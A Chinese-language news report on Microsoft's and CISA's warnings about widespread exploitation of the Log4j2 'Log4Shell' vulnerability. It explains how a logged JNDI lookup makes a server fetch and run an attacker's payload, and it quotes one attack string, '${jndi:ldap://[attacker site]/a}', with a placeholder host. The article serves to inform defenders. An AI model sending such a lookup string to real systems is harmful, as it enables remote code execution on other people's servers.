[[440760]]

微軟再次發(fā)出了來自具有深厚背景的黑客組織的網(wǎng)絡(luò)攻擊預(yù)警，可知問題源于 Java 日志庫的 Log4j2 漏洞(CVE-2021-44228)。這家雷德蒙德科技巨頭指出，世界多地的黑客已開始利用這項(xiàng)更復(fù)雜的日志協(xié)議技術(shù)，來遠(yuǎn)程訪問受害者的設(shè)備。目前觀察到的大部分攻擊，主要涉及各路人馬的大規(guī)模掃描。

據(jù)悉，微軟旗下的多個(gè)威脅情報(bào)團(tuán)隊(duì) —— 包括 MSTIC 威脅情報(bào)中心、 Microsoft 365 Defender 威脅情報(bào)團(tuán)隊(duì)、RiskIQ 和 DART 檢測響應(yīng)團(tuán)隊(duì) —— 一直在密切關(guān)注 Apache Log4j2 的遠(yuǎn)程代碼執(zhí)行(RCE)漏洞。

CVE-2021-44228 漏洞披露公告指出，被稱作“Log4Shell”的漏洞攻擊，往往在 Web 日志請求中包含如下字符串：

${jndi:ldap://[attacker site]/a} 

美國網(wǎng)絡(luò)安全和基礎(chǔ)設(shè)施安全局(CISA)也證實(shí)了微軟的說法，此前該機(jī)構(gòu)同樣通報(bào)了 Log4Shell 漏洞的廣泛利用。

CISA 負(fù)責(zé)人 Jen Easterly 于昨日接受 CNN 采訪時(shí)重申，若不迅速采取補(bǔ)救措施，各個(gè)聯(lián)邦機(jī)構(gòu)的設(shè)備、服務(wù)、乃至整個(gè)互聯(lián)網(wǎng)，都將處于一個(gè)相當(dāng)可怕的境地。

微軟警告稱，Log4j2 的風(fēng)險(xiǎn)源于兩個(gè)方面。其一是漏洞可被輕松利用，其二是基于其構(gòu)建的產(chǎn)品數(shù)量 —— 而 Apache Log4j2 就是當(dāng)前最流行的 Java 日志庫之一。

據(jù)悉，日志庫用于為開發(fā)者提供有關(guān)服務(wù)和產(chǎn)品的附加信息，允許其控制在應(yīng)用程序執(zhí)行期間、用戶登錄特定服務(wù) / 設(shè)備的錯(cuò)誤報(bào)告，并在遇到功能問題時(shí)收集相關(guān)數(shù)據(jù)。

通過日志庫的使用，開發(fā)者還可深入了解或收集設(shè)備詳情，包括 CPU 類型 / GPU 型號、驅(qū)動程序版本、以及系統(tǒng)內(nèi)存等。

攻擊者會對使用 Log4j2 生成日志的目標(biāo)系統(tǒng)執(zhí)行 HTTP 請求，該日志利用 JNDI 向攻擊者控制的站點(diǎn)執(zhí)行請求，最終導(dǎo)致被利用的進(jìn)程訪問站點(diǎn)并執(zhí)行有效負(fù)載。

在許多觀察到的案例中，攻擊者往往拿到了 DNS 日志系統(tǒng)的參數(shù)，旨在記錄對站點(diǎn)的請求、以對易受攻擊的系統(tǒng)進(jìn)行指紋識別。

此前已知的一種漏洞利用，涉及微軟旗下的《我的世界》服務(wù)器。攻擊者以聊天框作為中部署的消息內(nèi)容作為管道，試圖滲透用戶系統(tǒng)并奪得控制權(quán)。

事實(shí)上，全球許多知名企業(yè)都面臨著巨大的風(fēng)險(xiǎn)，其中不乏微軟、Twitter、蘋果、亞馬遜、百度、Cloudflare、網(wǎng)易、Cloudflare 等科技巨頭。

網(wǎng)絡(luò)安全公司 Check Point 指出，截至目前，其 GitHub 項(xiàng)目的下載量已經(jīng)超過 40 萬次。遺憾的是，盡管 Apache 已經(jīng)發(fā)布了一個(gè)修補(bǔ)程序，但各家公司的實(shí)施方案不盡相同。

對于數(shù)百上千萬的客戶來說，這意味著他們?nèi)詫⒃谖磥硪欢螘r(shí)間里面臨 Log4j 入侵風(fēng)險(xiǎn)，或?qū)е麓罅坑脩魯?shù)據(jù)暴露于在外。